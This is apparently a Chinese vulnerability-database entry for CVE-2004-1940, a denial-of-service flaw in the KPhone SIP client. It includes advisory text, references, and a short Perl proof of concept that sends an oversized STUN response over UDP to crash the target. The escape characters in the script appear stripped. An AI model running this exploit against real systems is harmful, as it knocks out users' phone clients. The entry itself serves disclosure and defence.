KPhone Malformed STUN Packet拒绝服务漏洞

16次阅读
没有评论

KPhone Malformed STUN Packet拒绝服务漏洞

漏洞ID 1107856 漏洞类型 其他
发布时间 2004-04-08 更新时间 2005-10-20
KPhone Malformed STUN Packet拒绝服务漏洞CVE编号 CVE-2004-1940
KPhone Malformed STUN Packet拒绝服务漏洞CNNVD-ID CNNVD-200412-270
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/24011
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-270
|漏洞详情
KPhone4.0.1及其以前版本的sipclient.cpp存在漏洞。远程攻击者借助STUN响应包导致服务拒绝(崩溃),这个STUN响应包具有超大attrLen值导致out-of-bounds读取。
|漏洞EXP
source: http://www.securityfocus.com/bid/10159/info

A denial of service vulnerability has been reported in KPhone. This issue may be triggered by a malformed SIP (Session Initiation Protocol) STUN message. This is due to insufficient validation of user-specified STUN packet attribute lengths, causing an out of bounds read and subsequent crash.

It is not known if this condition could be further exploited to execute arbitrary code, though it has been conjectured that it is not exploitable.

#!/usr/bin/perl
 

use IO::Socket::INET;

my $buf = join("", "x01x01", # BindingResponse
    "x00x01", # MsgLength
    "A"x16, # GUID
    "x00x00", # Attribute
    "x08x01", # AttrLength
    "A"x7975 # Value
   );

my $remote = IO::Socket::INET->new( Proto => 'udp',
         PeerAddr => '192.168.1.49',
         PeerPort => 5060);

print $remote $buf;
|参考资料

来源:www.wirlab.net
链接:http://www.wirlab.net/kphone/changes-4.0.2.html
来源:BID
名称:10159
链接:http://www.securityfocus.com/bid/10159
来源:XF
名称:kphone-stun-dos(15874)
链接:http://xforce.iss.net/xforce/xfdb/15874
来源:www.securiteam.com
链接:http://www.securiteam.com/unixfocus/5PP0B1FCLY.html
来源:BUGTRAQ
名称:20040419KPhoneSTUNDoS(MalformedSTUNPackets)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108244325924859&w;=2

相关推荐: Agnitum Outpost Firewall Remote Denial of Service Vulnerability

Agnitum Outpost Firewall Remote Denial of Service Vulnerability 漏洞ID 1098439 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 20…

正文完
 0